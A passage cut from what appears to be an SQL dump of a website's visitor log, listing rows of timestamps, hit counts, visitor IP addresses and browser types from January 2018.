ome'),(199350,1516264909,3,3,0,0,'216.244.66.194','other'),(199351,1516265325,1,0,1,0,'66.249.64.29',''),(199352,1516265419,4,4,0,0,'216.244.66.246','other'),(199353,1516265487,1,1,0,0,'54.36.148.147','other'),(199354,1516265627,1,1,0,0,'54.36.148.97','other'),(199355,1516265722,1,1,0,0,'54.36.148.117','other'),(199356,1516266145,1,1,0,0,'91.196.178.51','chrome'),(199357,1516266258,1,1,0,0,'54.36.148.167','other'),(199358,1516266659,1,1,0,0,'54.36.149.106','other'),(199359,1516266675,1,1,0,0,'77.111.244.61','chrome'),(199360,1516266775,1,1,0,0,'54.36.148.75','other'),(199361,1516267176,1,1,0,0,'54.36.149.34','other'),(199362,1516267368,1,1,0,0,'54.36.148.171','other'),(199363,1516267426,1,1,0,0,'91.196.178.79','chrome'),(199364,1516267962,1,1,0,0,'54.36.148.95','other'),(199365,1516268268,1,1,0,0,'54.36.148.48','other'),(199366,1516268269,1,1,0,0,'91.196.178.86','firefox'),(199367,1516268316,3,3,0,0,'216.244.66.246','other'),(199368,1516268495,1,1,0,0,'54.36.148.171','other'),(199369,1516268627,1,1,0,0,'54.36.148.152','other'),(199370,1516268728,1,1,0,0,'91.196.178.162','chrome'),(199371,1516268782,1,1,0,0,'176.120.111.110','chrome'),(199372,1516269049,1,1,0,0,'95.132.60.135','firefox'),(199373,1516269340,1,1,0,0,'54.36.148.101','other'),(199374,1516269466,1,1,0,0,'91.196.178.86','chrome'),(199375,1516270107,1,1,0,0,'54.36.149.36','other'),(199376,1516270258,1,1,0,0,'54.36.148.247','other'),(199377,1516271522,1,1,0,0,'91.90.20.86','chrome'),(199378,1516271892,1,1,0,0,'193.201.224.32','firefox'),(199379,1516272030,1,1,0,0,'8.29.198.25','other'),(199380,1516272495,1,1,0,0,'217.69.133.224','other'),(199381,1516272792,2,2,0,0,'91.196.178.86','chrome'),(199382,1516272931,1,1,0,0,'91.196.178.98','chrome'),(199383,1516272977,1,1,0,0,'54.36.149.82','other'),(199384,1516273198,1,1,0,0,'54.36.149.15','other'),(199385,1516273274,1,1,0,0,'54.36.148.14','other'),(199386,1516273673,1,1,0,0,'157.55.39.218','other'),(199387,1516273756,1,1,0,0,'54.36.148.23','other'),(199388,1516273781,1,1,0,0,'54.36.149.11','other'),(199389,1516273937,1,1,0,0,'51.255.71.133','other'),(199390,1516274117,1,1,0,0,'54.36.149.43','other'),(199391,1516274448,1,1,0,0,'207.46.13.9','other'),(199392,1516274624,2,2,0,0,'91.196.178.162','chrome'),(199393,1516275072,1,1,0,0,'216.244.66.246','other'),(199394,1516275234,1,0,1,0,'68.180.229.52',''),(199395,1516275453,1,1,0,0,'54.36.148.39','other'),(199396,1516275554,2,2,0,0,'216.244.66.194','other'),(199397,1516275616,1,1,0,0,'91.196.178.162','chrome'),(199398,1516275695,1,1,0,0,'91.229.121.2','opera'),(199399,1516275780,1,1,0,0,'54.36.148.53','other'),(199400,1516276065,1,1,0,0,'54.36.148.235','other'),(199401,1516276108,1,1,0,0,'54.36.148.149','other'),(199402,1516276332,1,1,0,0,'54.36.149.29','other'),(199403,1516276944,1,1,0,0,'40.77.167.97','other'),(199404,1516277270,1,1,0,0,'91.196.178.18','chrome'),(199405,1516277531,1,1,0,0,'54.36.149.3','other'),(199406,1516277748,1,1,0,0,'54.36.149.82','other'),(199407,1516278298,1,1,0,0,'217.69.133.233','other'),(199408,1516278699,1,1,0,0,'54.36.149.45','other'),(199409,1516278720,1,1,0,0,'207.46.13.9','other'),(199410,1516279071,1,1,0,0,'216.244.66.246','other'),(199411,1516279425,1,1,0,0,'91.196.178.167','chrome'),(199412,1516279462,1,1,0,0,'54.36.149.80','other'),(199413,1516279807,1,1,0,0,'54.36.148.149','other'),(199414,1516279951,1,1,0,0,'91.196.178.86','firefox'),(199415,1516280280,1,1,0,0,'178.154.171.88','other'),(199416,1516280474,1,1,0,0,'54.36.149.8','other'),(199417,1516280542,1,1,0,0,'54.36.148.178','other'),(199418,1516280758,1,1,0,0,'91.196.178.162','chrome'),(199419,1516280782,1,1,0,0,'217.77.209.134','chrome'),(199420,1516281130,1,1,0,0,'95.132.60.135','firefox'),(199421,1516281316,1,1,0,0,'54.36.148.47','other'),(199422,1516281396,1,1,0,0,'54.36.148.51','other'),(199423,1516281469,1,1,0,0,'54.36.148.250','other'),(199424,1516281502,1,1,0,0,'34.207.57.252','other'),(199425,1516281600,1,1,0,0,'54.36.148.100','other'),(199426,1516281833,5,5,0,0,'216.244.66.194','other'),(199427,1516281867,1,1,0,0,'91.196.178.71','firefox'),(199428,1516281930,1,1,0,0,'91.196.178.92','chrome'),(199429,1516281994,1,1,0,0,'91.196.178.167','chrome'),(199430,1516282045,1,1,0,0,'54.36.149.52','other'),(199431,1516282078,8,8,0,0,'5.9.144.195','other'),(199432,1516282493,1,1,0,0,'34.207.57.252','other'),(199433,1516282626,2,2,0,0,'194.9.37.107','chrome'),(199434,1516282846,1,1,0,0,'91.209.11.236','other'),(199435,1516282867,1,1,0,0,'8.29.198.27','other'),(199436,1516283478,1,1,0,0,'34.207.57.252','other'),(199437,1516283552,1,1,0,0,'54.36.149.16','other'),(199438,1516283600,1,1,0,0,'91.196.178.85','chrome'),(199439,1516283759,1,1,0,0,'91.239.241.9','chrome'),(199440,1516283836,1,1,0,0,'54.36.148.146','other'),(199441,1516284122,1,1,0,0,'54.36.149.31','other'),(199442,1516284296,1,1,0,0,'54.36.149.49','other'),(199443,1516284425,1,1,0,0,'34.207.57.252','other'),(199444,1516284611,1,1,0,0,'54.36.148.251','other'),(199445,1516285237,1,1,0,0,'91.196.178.85','chrome'),(199446,1516285451,1,1,0,0,'34.207.57.252','other'),(199447,1516285454,5,5,0,0,'216.244.66.246','other'),(199448,1516285749,1,1,0,0,'54.36.148.58','other'),(199449,1516285764,1,1,0,0,'37.53.224.223','chrome'),(199450,1516286084,2,2,0,0,'216.244.66.194','other'),(199451,1516286291,1,1,0,0,'157.55.39.218','other'),(199452,1516286369,1,1,0,0,'34.207.57.252','other'),(199453,1516286383,1,1,0,0,'207.46.13.7','other'),(199454,1516286674,1,1,0,0,'54.36.149.5','other'),(199455,1516286695,1,1,0,0,'91.209.11.236','other'),(199456,1516286960,1,1,0,0,'146.0.231.218','chrome'),(199457,1516287089,1,1,0,0,'91.196.178.85','chrome'),(199458,1516287153,1,1,0,0,'54.36.148.177','other'),(199459,1516287283,1,1,0,0,'54.36.149.25','other'),(199460,1516287295,1,1,0,0,'34.207.57.252','other'),(199461,1516288121,1,1,0,0,'37.53.224.223','chrome'),(199462,1516288217,1,1,0,0,'34.207.57.252','other'),(199463,1516288584,1,0,1,0,'66.249.64.29',''),(199464,1516288716,1,1,0,0,'157.55.39.218','other'),(199465,1516288900,1,1,0,0,'188.230.43.254','other'),(199466,1516289132,1,1,0,0,'34.207.57.252','other'),(199467,1516289356,1,1,0,0,'54.36.148.172','other'),(199468,1516290096,1,1,0,0,'34.207.57.252','other'),(199469,1516290155,4,4,0,0,'216.244.66.246','other'),(199470,1516290357,1,1,0,0,'91.209.11.236','other'),(199471,1516290402,1,1,0,0,'54.36.148.14','other'),(199472,1516290520,1,1,0,0,'54.36.148.233','other'),(199473,1516290778,1,1,0,0,'91.196.178.85','chrome'),(199474,1516291152,1,1,0,0,'207.46.13.10','other'),(199475,1516291271,1,1,0,0,'207.46.13.7','other'),(199476,1516291299,1,1,0,0,'188.230.43.254','other'),(199477,1516292658,1,1,0,0,'188.230.43.254','other'),(199478,1516293026,2,2,0,0,'216.244.66.194','other'),(199479,1516293677,1,1,0,0,'54.36.148.161','other'),(199480,1516293695,1,1,0,0,'8.29.198.27','other'),(199481,1516294173,1,1,0,0,'91.196.178.101','firefox'),(199482,1516294542,1,1,0,0,'54.36.148.165','other'),(199483,1516294605,1,1,0,0,'54.36.148.120','other'),(199484,1516294661,1,1,0,0,'176.193.191.121','msie'),(199485,1516294662,1,1,0,0,'54.36.148.203','other'),(199486,1516294671,1,1,0,0,'54.36.148.243','other'),(199487,1516294706,1,1,0,0,'54.36.148.71','other'),(199488,1516294740,1,1,0,0,'54.36.148.83','other'),(199489,1516294897,1,1,0,0,'188.230.43.254','other'),(199490,1516295691,1,1,0,0,'51.255.71.121','other'),(199491,1516295699,1,1,0,0,'54.36.148.75','other'),(199492,1516295742,1,1,0,0,'216.244.66.246','other'),(199493,1516295986,1,1,0,0,'54.36.148.58','other'),(199494,1516296047,4,4,0,0,'216.244.66.194','other'),(199495,1516296466,1,1,0,0,'91.196.178.161','chrome'),(199496,1516296697,1,1,0,0,'51.255.71.133','other'),(199497,1516296839,1,1,0,0,'54.36.148.116','other'),(199498,1516297220,2,2,0,0,'91.209.11.236','other'),(199499,1516297549,1,1,0,0,'216.244.66.237','other'),(199500,1516297724,1,1,0,0,'93.75.8.57','firefox'),(199501,1516297820,1,1,0,0,'108.59.8.70','other'),(199502,1516298713,1,1,0,0,'54.36.148.156','other'),(199503,1516298887,1,1,0,0,'54.36.148.164','other'),(199504,1516299208,1,1,0,0,'51.255.71.118','other'),(199505,1516299718,1,1,0,0,'54.36.149.107','other'),(199506,1516299786,1,1,0,0,'207.46.13.9','other'),(199507,1516300506,1,1,0,0,'54.36.149.22','other'),(199508,1516301217,1,1,0,0,'91.196.178.90','chrome'),(199509,1516301375,3,3,0,0,'216.244.66.246','other'),(199510,1516301622,1,1,0,0,'54.36.149.105','other'),(199511,1516301919,1,1,0,0,'207.46.13.9','other'),(199512,1516302221,1,1,0,0,'54.36.148.136','other'),(199513,1516303198,2,2,0,0,'216.244.66.194','other'),(199514,1516303479,1,1,0,0,'54.36.148.111','other'),(199515,1516303725,1,1,0,0,'91.196.178.18','chrome'),(199516,1516303883,1,1,0,0,'207.46.13.7','other'),(199517,1516303928,1,1,0,0,'188.225.75.111','chrome'),(199518,1516304213,1,1,0,0,'37.73.212.141','chrome'),(199519,1516304221,1,1,0,0,'54.36.148.27','other'),(199520,1516304365,1,1,0,0,'54.36.149.12','other'),(199521,1516304367,1,1,0,0,'54.36.148.71','other'),(199522,1516304524,1,1,0,0,'8.29.198.27','other'),(199523,1516305104,2,2,0,0,'216.244.66.246','other'),(199524,1516305137,1,1,0,0,'207.46.13.9','other'),(199525,1516305216,1,1,0,0,'54.36.149.74','other'),(199526,1516305398,1,1,0,0,'176.8.141.224','chrome'),(199527,1516305657,1,1,0,0,'54.36.148.252','other'),(199528,1516305837,1,1,0,0,'54.36.148.245','other'),(199529,1516305875,1,1,0,0,'157.55.39.218','other'),(199530,1516305946,2,2,0,0,'216.244.66.194','other'),(199531,1516306651,1,1,0,0,'54.36.149.65','other'),(199532,1516306801,1,1,0,0,'54.36.148.60','other'),(199533,1516306978,1,1,0,0,'46.211.0.80','chrome'),(199534,1516307750,1,1,0,0,'54.36.148.11','other'),(199535,1516307838,1,1,0,0,'54.36.149.88','other'),(199536,1516308256,1,1,0,0,'54.36.148.125','other'),(199537,1516308294,1,1,0,0,'207.46.13.7','other'),(199538,1516308476,1,1,0,0,'54.36.148.51','other'),(199539,1516308557,1,1,0,0,'207.46.13.10','other'),(199540,1516308646,1,1,0,0,'54.36.148.151','other'),(199541,1516308813,1,1,0,0,'54.36.148.82','other'),(199542,1516309867,1,1,0,0,'54.36.149.88','other'),(199543,1516309889,1,1,0,0,'54.36.149.14','other'),(199544,1516309910,1,1,0,0,'54.36.148.117','other'),(199545,1516310598,1,1,0,0,'54.36.148.113','other'),(199546,1516311111,1,1,0,0,'141.8.142.74','other'),(199547,1516311409,1,1,0,0,'37.9.113.182','other'),(199548,1516311711,1,1,0,0,'178.154.171.88','other'),(199549,1516311905,1,1,0,0,'54.36.148.239','other'),(199550,1516312195,2,2,0,0,'216.244.66.246','other'),(199551,1516312249,1,1,0,0,'178.159.37.11','chrome'),(199552,1516312893,3,3,0,0,'216.244.66.194','other'),(199553,1516312923,1,1,0,0,'54.36.148.243','other'),(199554,1516313260,1,1,0,0,'207.46.13.9','other'),(199555,1516313983,1,1,0,0,'37.9.113.114','other'),(199556,1516314125,1,1,0,0,'54.36.149.5','other'),(199557,1516314356,1,1,0,0,'96.47.226.22','other'),(199558,1516314418,1,1,0,0,'54.36.149.68','other'),(199559,1516314428,1,1,0,0,'216.244.66.246','other'),(199560,1516314432,1,1,0,0,'141.8.142.74','other'),(199561,1516314434,1,1,0,0,'54.36.148.165','other'),(199562,1516314512,1,1,0,0,'157.55.39.218','other'),(199563,1516314691,3,3,0,0,'5.9.89.170','other'),(199564,1516315163,1,1,0,0,'51.255.71.116','other'),(199565,1516315233,1,1,0,0,'5.45.207.83','other'),(199566,1516315370,1,1,0,0,'8.29.198.25','other'),(199567,1516315829,2,2,0,0,'216.244.66.194','other'),(199568,1516315999,1,1,0,0,'69.30.198.242','other'),(199569,1516316025,1,1,0,0,'54.36.148.252','other'),(199570,1516316187,1,1,0,0,'54.36.148.241','other'),(199571,1516316629,1,1,0,0,'54.36.149.53','other'),(199572,1516316708,1,1,0,0,'37.9.113.182','other'),(199573,1516317923,1,1,0,0,'54.36.148.39','other'),(199574,1516317989,1,1,0,0,'141.8.132.19','other'),(199575,1516318650,45,45,0,0,'54.167.126.106','other'),(199576,1516319251,1,1,0,0,'54.36.149.55','other'),(199577,1516319463,1,1,0,0,'54.36.148.11','other'),(199578,1516319514,1,1,0,0,'54.36.148.76','other'),(199579,1516319567,45,45,0,0,'54.167.126.106','other'),(199580,1516319825,1,1,0,0,'54.36.149.1','other'),(199581,1516320103,1,1,0,0,'54.36.148.188','other'),(199582,1516320253,1,1,0,0,'54.36.148.231','other'),(199583,1516320599,52,52,0,0,'138.201.215.222','chrome'),(199584,1516320647,1,1,0,0,'54.36.149.64','other'),(199585,1516320666,1,1,0,0,'54.36.148.120','other'),(199586,1516321722,1,1,0,0,'54.36.149.35','other'),(199587,1516322405,5,5,0,0,'136.243.68.226','other'),(199588,1516322465,1,1,0,0,'52.86.131.43','other'),(199589,1516322857,1,1,0,0,'146.0.231.218','chrome'),(199590,1516323086,3,3,0,0,'216.244.66.194','other'),(199591,1516323233,4,4,0,0,'216.244.66.246','other'),(199592,1516323389,1,1,0,0,'54.36.148.250','other'),(199593,1516323623,1,1,0,0,'141.8.142.74','other'),(199594,1516324274,1,1,0,0,'51.255.71.130','other'),(199595,1516325001,1,1,0,0,'54.36.148.99','other'),(199596,1516325190,1,1,0,0,'51.255.71.129','other'),(199597,1516325348,1,1,0,0,'54.36.148.170','other'),(199598,1516325619,1,1,0,0,'54.36.148.134','other'),(199599,1516325894,1,1,0,0,'54.36.148.230','other'),(199600,1516326108,3,3,0,0,'216.244.66.246','other'),(199601,1516326204,1,1,0,0,'8.29.198.26','other'),(199602,1516326292,1,1,0,0,'54.36.149.4','other'),(199603,1516327432,1,1,0,0,'87.250.224.46','other'),(199604,1516328037,1,1,0,0,'40.77.167.125','other'),(199605,1516328283,1,1,0,0,'54.36.148.57','other'),(199606,1516328302,1,1,0,0,'54.36.148.182','other'),(199607,1516328730,1,1,0,0,'54.36.148.115','other'),(199608,1516328903,2,2,0,0,'178.154.171.88','other'),(199609,1516329099,1,1,0,0,'37.9.113.182','other'),(199610,1516329691,1,1,0,0,'51.255.71.119','other'),(199611,1516329919,1,1,0,0,'54.36.149.41','other'),(199612,1516330783,1,1,0,0,'54.36.149.23','other'),(199613,1516331190,1,1,0,0,'54.36.148.176','other'),(199614,1516331440,1,1,0,0,'178.154.171.88','other'),(199615,1516331942,1,1,0,0,'37.9.113.110','other'),(199616,1516332399,1,1,0,0,'40.77.167.125','other'),(199617,1516332681,3,3,0,0,'216.244.66.246','other'),(199618,1516333638,1,1,0,0,'37.9.113.101','other'),(199619,1516333805,3,3,0,0,'216.244.66.194','other'),(199620,1516334085,1,1,0,0,'54.36.149.73','other'),(199621,1516334194,1,1,0,0,'54.36.149.93','other'),(199622,1516334661,1,1,0,0,'54.36.148.93','other'),(199623,1516335008,1,1,0,0,'37.9.113.182','other'),(199624,1516335246,1,1,0,0,'66.249.64.29','chrome'),(199625,1516335409,1,1,0,0,'54.36.149.55','other'),(199626,1516335560,1,1,0,0,'54.36.148.229','other'),(199627,1516335600,1,1,0,0,'54.36.148.238','other'),(199628,1516336026,4,4,0,0,'216.244.66.194','other'),(199629,1516336083,1,1,0,0,'54.36.148.240','other'),(199630,1516336336,1,1,0,0,'216.244.66.246','other'),(199631,1516336355,4,4,0,0,'54.165.59.7','other'),(199632,1516336682,1,1,0,0,'40.77.167.122','other'),(199633,1516336755,1,1,0,0,'54.36.148.253','other'),(199634,1516336771,1,1,0,0,'54.36.149.77','other'),(199635,1516337033,1,1,0,0,'8.29.198.25','other'),(199636,1516337255,14,14,0,0,'178.203.120.211','other'),(199637,1516337504,1,1,0,0,'54.36.149.94','other'),(199638,1516338372,2,2,0,0,'87.250.224.46','other'),(199639,1516338667,1,1,0,0,'40.77.167.125','other'),(199640,1516339205,1,1,0,0,'54.36.149.60','other'),(199641,1516339575,1,1,0,0,'54.36.148.180','other'),(199642,1516340251,1,1,0,0,'54.36.148.71','other'),(199643,1516340308,1,1,0,0,'54.165.59.7','other'),(199644,1516340616,1,1,0,0,'213.180.203.7','other'),(199645,1516341299,1,1,0,0,'54.36.148.158','other'),(199646,1516341957,1,1,0,0,'54.36.148.16','other'),(199647,1516342268,1,1,0,0,'54.36.148.243','other'),(199648,1516342465,2,2,0,0,'178.154.171.88','other'),(199649,1516342564,1,1,0,0,'141.8.142.74','other'),(199650,1516342846,1,1,0,0,'54.36.148.254','other'),(199651,1516342935,4,4,0,0,'216.244.66.246','other'),(199652,1516342970,1,1,0,0,'176.105.215.20','chrome'),(199653,1516343508,1,1,0,0,'185.149.23.164','chrome'),(199654,1516343563,1,1,0,0,'178.154.171.4','other'),(199655,1516343867,1,1,0,0,'54.36.148.109','other'),(199656,1516344231,1,1,0,0,'54.36.148.146','other'),(199657,1516344308,1,0,1,0,'66.249.70.27',''),(199658,1516344366,1,1,0,0,'95.132.60.135','firefox'),(199659,1516344550,1,1,0,0,'54.36.148.205','other'),(199660,1516344606,1,1,0,0,'91.196.178.88','chrome'),(199661,1516344685,1,1,0,0,'54.36.148.12','other'),(199662,1516345399,1,1,0,0,'216.244.66.194','other'),(199663,1516346023,1,1,0,0,'91.196.178.79','chrome'),(199664,1516346062,1,1,0,0,'54.36.149.31','other'),(199665,1516346299,1,1,0,0,'91.196.177.110','chrome'),(199666,1516346608,2,2,0,0,'216.244.66.246','other'),(199667,1516346782,1,1,0,0,'54.36.148.124','other'),(199668,1516346998,1,1,0,0,'54.36.148.106','other'),(199669,1516347032,1,1,0,0,'141.8.132.19','other'),(199670,1516347074,1,1,0,0,'91.196.178.169','chrome'),(199671,1516347236,1,1,0,0,'54.36.148.85','other'),(199672,1516347273,1,1,0,0,'157.55.39.4','other'),(199673,1516347470,1,1,0,0,'37.73.225.80','chrome'),(199674,1516347575,1,1,0,0,'54.36.149.49','other'),(199675,1516347712,1,1,0,0,'178.154.171.4','other'),(199676,1516347716,1,1,0,0,'37.9.113.151','other'),(199677,1516347795,1,1,0,0,'54.36.149.93','other'),(199678,1516347876,1,1,0,0,'8.29.198.26','other'),(199679,1516347886,1,1,0,0,'91.196.178.93','chrome'),(199680,1516347967,1,1,0,0,'52.86.131.43','other'),(199681,1516348664,1,1,0,0,'213.180.203.8','other'),(199682,1516348887,1,1,0,0,'52.86.131.43','other'),(199683,1516348908,1,1,0,0,'91.196.178.93','chrome'),(199684,1516349171,1,0,1,0,'66.249.64.30',''),(199685,1516349746,1,1,0,0,'37.9.113.157','other'),(199686,1516349799,1,1,0,0,'54.36.148.46','other'),(199687,1516349815,1,1,0,0,'52.86.131.43','other'),(199688,1516350415,1,0,1,0,'66.249.70.29',''),(199689,1516350512,1,1,0,0,'91.196.178.93','chrome'),(199690,1516350785,1,1,0,0,'52.86.131.43','other'),(199691,1516351148,1,1,0,0,'195.230.119.34','chrome'),(199692,1516351478,1,1,0,0,'46.211.121.37','chrome'),(199693,1516351784,1,1,0,0,'54.36.148.116','other'),(199694,1516352540,3,3,0,0,'216.244.66.246','other'),(199695,1516352620,1,1,0,0,'91.196.178.102','chrome'),(199696,1516352632,1,1,0,0,'46.201.174.130','chrome'),(199697,1516353342,1,1,0,0,'216.244.65.58','chrome'),(199698,1516354040,1,1,0,0,'37.52.21.23','opera'),(199699,1516354152,1,1,0,0,'54.36.149.61','other'),(199700,1516354275,1,1,0,0,'95.132.29.245','firefox'),(199701,1516354428,1,1,0,0,'37.9.113.110','other'),(199702,1516354465,3,3,0,0,'216.244.66.194','other'),(199703,1516354757,1,1,0,0,'91.196.178.87','firefox'),(199704,1516354793,1,1,0,0,'54.36.148.35','other'),(199705,1516355172,1,1,0,0,'178.154.171.88','other'),(199706,1516355288,1,1,0,0,'54.36.148.61','other'),(199707,1516355672,1,1,0,0,'37.9.113.182','other'),(199708,1516355951,1,1,0,0,'54.36.149.45','other'),(199709,1516356105,1,1,0,0,'54.36.148.39','other'),(199710,1516356249,2,2,0,0,'216.244.66.194','other'),(199711,1516356478,1,1,0,0,'91.196.178.167','chrome'),(199712,1516356694,1,1,0,0,'54.36.148.230','other'),(199713,1516356744,1,1,0,0,'146.0.231.218','firefox'),(199714,1516357095,2,2,0,0,'216.244.66.246','other'),(199715,1516357213,1,1,0,0,'91.196.178.79','firefox'),(199716,1516357500,1,1,0,0,'91.196.177.15','chrome'),(199717,1516357667,1,1,0,0,'178.154.200.7','other'),(199718,1516357705,1,1,0,0,'54.36.148.251','other'),(199719,1516357767,1,1,0,0,'91.196.178.162','chrome'),(199720,1516357885,1,1,0,0,'54.36.148.110','other'),(199721,1516357984,1,1,0,0,'37.9.113.110','other'),(199722,1516358185,1,1,0,0,'91.196.178.88','chrome'),(199723,1516358548,1,1,0,0,'95.134.202.192','firefox'),(199724,1516358715,1,1,0,0,'8.29.198.26','other'),(199725,1516358814,1,1,0,0,'54.36.148.143','other'),(199726,1516358858,1,1,0,0,'54.36.148.237','other'),(199727,1516358994,1,1,0,0,'178.95.184.124','chrome'),(199728,1516359057,2,2,0,0,'91.196.177.15','chrome'),(199729,1516359207,1,1,0,0,'95.135.27.194','chrome'),(199730,1516359532,1,1,0,0,'213.180.203.8','other'),(199731,1516359638,1,1,0,0,'54.36.148.95','other'),(199732,1516359745,1,1,0,0,'87.250.224.46','other'),(199733,1516359955,1,1,0,0,'91.196.178.73','firefox'),(199734,1516360087,1,1,0,0,'91.196.178.167','chrome'),(199735,1516360094,2,2,0,0,'91.196.178.164','chrome'),(199736,1516360379,1,1,0,0,'54.36.148.23','other'),(199737,1516360586,1,1,0,0,'54.36.148.65','other'),(199738,1516360873,1,0,1,0,'66.249.64.28',''),(199739,1516361083,1,1,0,0,'54.36.149.26','other'),(199740,1516361084,1,1,0,0,'54.36.148.74','other'),(199741,1516361223,15,15,0,0,'23.237.4.26','other'),(199742,1516361252,1,1,0,0,'107.167.109.135','other'),(199743,1516361461,1,1,0,0,'54.36.149.8','other'),(199744,1516361479,1,1,0,0,'54.36.148.87','other'),(199745,1516361617,1,1,0,0,'54.36.148.206','other'),(199746,1516362511,3,3,0,0,'216.244.66.246','other'),(199747,1516362520,1,1,0,0,'91.196.178.130','other'),(199748,1516362773,1,1,0,0,'54.36.148.131','other'),(199749,1516363606,1,1,0,0,'96.47.226.20','other'),(199750,1516364399,1,1,0,0,'162.210.196.100','other'),(199751,1516364751,1,1,0,0,'207.244.157.139','chrome'),(199752,1516365033,4,4,0,0,'216.244.66.194','other'),(199753,1516365159,1,1,0,0,'54.36.149.50','other'),(199754,1516365221,1,1,0,0,'65.55.210.210','other'),(199755,1516365301,1,1,0,0,'213.108.45.138','chrome'),(199756,1516365416,1,1,0,0,'176.108.101.60','chrome'),(199757,1516365917,1,1,0,0,'54.36.149.107','other'),(199758,1516366051,1,1,0,0,'54.36.148.166','other'),(199759,1516366275,1,1,0,0,'91.196.178.133','firefox'),(199760,1516366347,1,1,0,0,'54.36.148.55','other'),(199761,1516366449,1,1,0,0,'216.244.66.194','other'),(199762,1516366522,1,1,0,0,'54.36.148.198','other'),(199763,1516366602,1,1,0,0,'91.250.54.143','chrome'),(199764,1516366644,1,1,0,0,'207.46.13.47','other'),(199765,1516366769,1,1,0,0,'54.36.148.144','other'),(199766,1516366937,1,1,0,0,'54.36.148.149','other'),(199767,1516366963,1,1,0,0,'54.36.148.17','other'),(199768,1516367921,1,1,0,0,'37.55.225.134','chrome'),(199769,1516368537,1,1,0,0,'54.36.148.254','other'),(199770,1516368896,1,1,0,0,'91.196.178.73','chrome'),(199771,1516368966,1,1,0,0,'91.196.178.66','chrome'),(199772,1516369184,1,1,0,0,'40.77.167.127','other'),(199773,1516369489,1,1,0,0,'54.36.148.246','other'),(199774,1516369521,1,1,0,0,'91.196.178.73','firefox'),(199775,1516369559,1,1,0,0,'8.29.198.27','other'),(199776,1516369739,1,1,0,0,'91.196.178.94','chrome'),(199777,1516369763,1,1,0,0,'87.250.224.46','other'),(199778,1516370335,1,1,0,0,'195.211.141.156','chrome'),(199779,1516370591,1,1,0,0,'54.36.148.41','other'),(199780,1516371030,1,1,0,0,'54.36.148.37','other'),(199781,1516371637,1,1,0,0,'146.0.231.218','chrome'),(199782,1516371742,1,1,0,0,'54.36.149.104','other'),(199783,1516372441,2,2,0,0,'141.8.142.74','other'),(199784,1516372445,1,1,0,0,'178.154.171.88','other'),(199785,1516372744,1,1,0,0,'54.36.148.252','other'),(199786,1516372907,1,1,0,0,'216.244.66.246','other'),(199787,1516373050,1,1,0,0,'54.36.148.72','other'),(199788,1516374061,1,1,0,0,'91.209.11.236','other'),(199789,1516374667,1,1,0,0,'66.249.64.29','chrome'),(199790,1516374802,1,1,0,0,'216.244.66.237','other'),(199791,1516374804,1,1,0,0,'54.36.148.44','other'),(199792,1516375004,2,2,0,0,'54.165.59.7','other'),(199793,1516375104,1,1,0,0,'178.154.171.88','other'),(199794,1516375235,1,1,0,0,'207.46.13.47','other'),(199795,1516375299,2,2,0,0,'216.244.66.194','other'),(199796,1516375464,1,1,0,0,'54.36.148.240','other'),(199797,1516375637,1,1,0,0,'54.36.149.100','other'),(199798,1516375771,1,1,0,0,'66.102.9.35','chrome'),(199799,1516376120,1,1,0,0,'54.36.148.79','other'),(199800,1516376382,1,1,0,0,'54.36.148.191','other'),(199801,1516376389,1,1,0,0,'54.36.149.101','other'),(199802,1516376721,1,1,0,0,'54.165.59.7','other'),(199803,1516376735,1,1,0,0,'207.46.13.47','other'),(199804,1516376921,1,1,0,0,'54.36.149.95','other'),(199805,1516378099,3,3,0,0,'216.244.66.246','other'),(199806,1516378568,1,1,0,0,'91.196.178.29','chrome'),(199807,1516378857,1,1,0,0,'54.36.148.191','other'),(199808,1516378941,1,1,0,0,'54.36.148.11','other'),(199809,1516379147,35,35,0,0,'178.203.120.211','other'),(199810,1516379158,1,1,0,0,'54.36.149.55','other'),(199811,1516379449,1,1,0,0,'54.36.149.103','other'),(199812,1516379946,1,1,0,0,'91.196.178.166','chrome'),(199813,1516380054,1,1,0,0,'54.36.148.90','other'),(199814,1516380402,1,1,0,0,'8.29.198.25','other'),(199815,1516380609,1,1,0,0,'54.36.148.65','other'),(199816,1516381900,1,1,0,0,'207.46.13.47','other'),(199817,1516382192,1,1,0,0,'91.209.11.236','other'),(199818,1516382560,1,1,0,0,'216.244.66.246','other'),(199819,1516383556,1,1,0,0,'54.36.148.79','other'),(199820,1516384557,1,1,0,0,'54.36.148.114','other'),(199821,1516384845,1,1,0,0,'54.36.149.106','other'),(199822,1516385385,2,2,0,0,'216.244.66.194','other'),(199823,1516385481,1,1,0,0,'54.36.149.68','other'),(199824,1516385572,1,1,0,0,'54.36.148.65','other'),(199825,1516385639,1,1,0,0,'54.36.149.97','other'),(199826,1516386080,1,1,0,0,'91.209.11.236','other'),(199827,1516386211,1,1,0,0,'54.36.149.101','other'),(199828,1516386240,1,1,0,0,'54.36.148.239','other'),(199829,1516386365,1,1,0,0,'54.36.149.9','other'),(199830,1516386680,1,1,0,0,'87.250.224.46','other'),(199831,1516386870,5,5,0,0,'216.244.66.194','other'),(199832,1516386938,1,1,0,0,'141.8.132.19','other'),(199833,1516387096,1,1,0,0,'141.8.142.74','other'),(199834,1516387328,1,1,0,0,'54.36.148.204','other'),(199835,1516387807,1,1,0,0,'37.9.113.182','other'),(199836,1516387879,1,1,0,0,'77.111.244.61','chrome'),(199837,1516387983,2,2,0,0,'91.196.178.166','chrome'),(199838,1516388376,1,1,0,0,'91.209.11.236','other'),(199839,1516388803,1,1,0,0,'93.175.201.246','firefox'),(199840,1516388804,1,1,0,0,'54.36.148.182','other'),(199841,1516389149,1,1,0,0,'54.36.149.105','other'),(199842,1516389297,1,1,0,0,'216.244.66.246','other'),(199843,1516390086,1,1,0,0,'51.255.71.131','other'),(199844,1516390107,1,1,0,0,'37.55.225.134','chrome'),(199845,1516390534,1,1,0,0,'54.36.149.26','other'),(199846,1516390613,1,1,0,0,'54.36.148.203','other'),(199847,1516390697,1,1,0,0,'54.36.149.44','other'),(199848,1516391158,1,1,0,0,'54.36.149.7','other'),(199849,1516391235,1,1,0,0,'8.29.198.26','other'),(199850,1516391433,1,1,0,0,'37.113.3.169','chrome'),(199851,1516391450,1,1,0,0,'54.36.149.15','other'),(199852,1516391703,1,1,0,0,'54.36.148.122','other'),(199853,1516391760,1,1,0,0,'146.0.231.218','firefox'),(199854,1516391919,1,1,0,0,'54.36.148.235','other'),(199855,1516391941,1,1,0,0,'40.77.167.120','other'),(199856,1516392776,1,1,0,0,'54.36.148.168','other'),(199857,1516392793,2,2,0,0,'216.244.66.246','other'),(199858,1516393069,1,1,0,0,'146.0.231.218','chrome'),(199859,1516393537,1,1,0,0,'137.74.207.170','other'),(199860,1516395334,3,3